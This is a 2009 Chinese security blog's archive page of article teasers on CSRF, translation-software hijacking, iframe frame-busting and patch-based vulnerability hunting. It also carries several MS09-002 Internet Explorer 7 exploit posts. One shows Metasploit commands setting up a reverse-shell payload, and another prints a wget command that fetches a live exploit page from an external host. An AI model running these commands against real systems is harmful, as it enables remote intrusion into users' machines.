2009年2月 的日志

从wap网站的认证授权到csrf的协议类比本质

作者:云舒

摘要:这个文章是周五开始酝酿的,前半部分是总结,最后一小段只是为了说明一下安全的相通性,将csrf类比到tcp协议,从协议的角度阐述一下 csrf产生的本质原因。想不到写到一小半就腰酸背疼,大部分内容都只能草草带过,很多地方需要进一步解释,都没法深入的描述下去了。一直说要坚持健身, 却从来没去过,是在是罪过,先凑合着看看吧,有问题还请指出一下。
阅读全文 »

Tags: ,

翻译软件劫持攻击

作者:Xeye Hack Team

你相信你的鼠标吗?

有没有想过,当你的鼠标在选取一段话,通过翻译软件的平面取词功能进行翻译,然后就被躲在角落的某个家伙给hack了。

–xeye hack team。

假如我们要完成以上的攻击,需要满足的条件:

1.找到翻译软件的漏洞,而且是remote的。

2.假设1成立,那么remote可以借助浏览器来搭桥,所以浏览器必须可以被翻译软件取词等等。
阅读全文 »

Tags: ,

iframe的防插与强插

作者:Monyer

网上通用的防插那版是(子):

if(top.location != self.location){
top.location = self.location;
}

强插方案为(父):
阅读全文 »

Tags:

读新术-基于开源代码更新的漏洞挖掘技巧

作者:FireFox[F.s.T]

文章投稿于09年2月黑客手册http://www.nohack.cn/
经编辑同意放出 目的是为与大家有更好的交流 更多精彩内容请参阅 黑客手册

背景:
所谓补丁或者更新,一直以来是研发方为更新产品安全问题、增加新功能或提高运行效率而发布的。但对于安全研究人员来讲,补丁或者更新一直以来也被认为是漏洞挖掘的“指南针”,就类似微软发布更新的星期二,就被很多安全研究人员喻为“Black tuesday”,为什么这样讲呢?因为很多安全研究人员可以根据补丁逆向分析出问题所在,从而再次触发漏洞,迅速编写漏洞溢出代码,通常情况下这种漏洞代码不被认为是0day,但是在大的范围内造成的影响丝毫不比0day差。
阅读全文 »

Tags: ,

动易SiteWeaver6.6版最新漏洞利用工具

作者:Cschii
来源:黑客防线
阅读全文 »

Tags: , , ,

MS09_002 Memory Corruption Exploit

来源:Carnal0wnage Blog

Details to follow. :-)

msf > use exploit/windows/browser/ms09_002
msf exploit(ms09_002) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ms09_002) > set LPORT 1701
LPORT => 1701
阅读全文 »

Tags: ,

Internet Explorer 7.0 Exploit(MS09-002,可以执行任意代码)

作者:Friddy

Microsoft IE CFunctionPointer函数内存破坏漏洞(MS09-002)
发布时间:2009-02-10
影响版本:
Microsoft Internet Explorer 7.0

漏洞描述:
BUGTRAQ ID: 33627
CVE(CAN) ID: CVE-2009-0075
阅读全文 »

Tags: ,

MS Internet Explorer 7 Memory Corruption PoC (MS09-002)

<!--
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html --user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
-->
 阅读全文 »
Tags: , ,